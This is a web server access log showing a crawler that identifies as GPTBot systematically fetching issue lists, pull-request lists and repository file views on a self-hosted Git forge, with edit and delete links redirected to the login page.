Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:18:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9876] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:18:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 44900] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:18:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:42:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 44917] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 74447] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=closed&type=all" +[17/Feb/2026:18:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=closed&type=all" +[17/Feb/2026:18:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=closed&type=all" +[17/Feb/2026:18:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.54] [Sent-to 192.168.0.250] 